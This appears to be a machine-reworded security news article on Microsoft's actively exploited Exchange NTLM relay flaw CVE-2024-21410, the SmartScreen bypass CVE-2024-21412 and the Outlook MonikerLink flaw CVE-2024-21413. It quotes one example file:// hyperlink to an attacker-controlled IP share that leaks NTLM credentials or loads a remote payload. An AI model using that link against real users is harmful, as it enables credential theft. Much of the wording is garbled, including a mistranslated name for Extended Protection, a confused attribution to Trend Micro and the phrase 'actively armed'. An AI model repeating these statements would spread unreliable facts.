Critical Exchange Server error (CVE-2024-21410) under active exploitation

Critical Exchange Server Flaw

Microsoft acknowledged Wednesday that a newly disclosed critical vulnerability in Exchange Server has been actively exploited in the wild, a day after it released fixes for the vulnerability as part of its Patch Tuesday updates.

Tracked as CVE-2024-21410 (CVSS score: 9.8), the issue has been described as a privilege escalation affecting the Exchange Server.

“An attacker could target an NTLM client such as Outlook with an NTLM credential vulnerability,” the company said said in an opinion published this week.

“The leaked credentials can then be passed to the Exchange server to gain privileges as a victim client and perform operations on the Exchange server on behalf of the victim.”

Successful exploitation of the flaw could allow an attacker to pass a user’s leaked Net-NTLMv2 hash to a sensitive Exchange Server and authenticate as the user, Redmond added.

The tech giant, in an update to its bulletin, revised its Exploitability Assessment to ‘Exploitation Detected’, noting that it now enabled Comprehensive protection for authentication (EPA) by default with the Exchange Server 2019 Cumulative Update 14 (CU14) update.

Details about the nature of the exploitation and the identities of the threat actors potentially exploiting the vulnerability are currently unknown. However, Russian state-affiliated hacking crews such as APT28 (also known as Forest Blizzard) have a history of exploiting flaws in Microsoft Outlook to conduct NTLM relay attacks.

Earlier this month, Trend Micro engaged the adversary in NTLM relay attacks targeting high-value entities since at least April 2022. The intrusions targeted organizations involved in foreign affairs, energy, defense and transportation, as well as organizations that concerned with labor and social security. , finance, parenting and local councils.

Critical Exchange Server error

CVE-2024-21410 adds to two other Windows flaws – CVE-2024-21351 (CVSS score: 7.6) and CVE-2024-21412 (CVSS score: 8.1) – released this week Microsoft have been patched and are actively armed in real-world attacks.

The exploitation of CVE-2024-21412, a bug that allows bypassing Windows SmartScreen protections, is attributed to an advanced persistent threat called Water Hydra (aka DarkCasino), which has previously used zero-days in WinRAR to exploit the Deploy DarkMe Trojan. .

“The group used Internet shortcuts disguised as a JPEG image that, when selected by the user, allows the threat actor to exploit CVE-2024-21412,” Trend Micro said. “The group can then bypass Microsoft Defender SmartScreen and fully compromise the Windows host as part of its attack chain.”

Microsoft’s Patch Tuesday update also addresses CVE-2024-21413, another critical flaw in Outlook email software that could result in remote code execution by trivially bypassing security measures such as Protected View.

The issue, codenamed MonikerLink by Check Point, “will have a broad and severe impact, ranging from leaking local NTLM credential information to arbitrary code execution.”

The vulnerability results from improperly parsing “file://” hyperlinks by adding an exclamation mark to URLs pointing to arbitrary payloads hosted on attacker-controlled servers (for example, “file:///\\10.10 .111.111\test\test .rtf!something”).

“The bug not only enables the leak of local NTLM information, but also allows remote code execution and more as an attack vector,” the cybersecurity firm said. said. “It could also bypass the Office Protected View when used as an attack vector to target other Office applications.”

#Critical #Exchange #Server #error #CVE202421410 #active #exploitation

Notify of
Inline Feedbacks
View all comments
Previous Post
Mobile Banking Malware Attacks

Chinese hackers use deepfakes in advanced malware attacks on mobile banking

Next Post
Hackers Weaponizing AI for Cyberattacks

Microsoft and OpenAI warn about nation-state hackers weaponizing AI for cyberattacks

Related Posts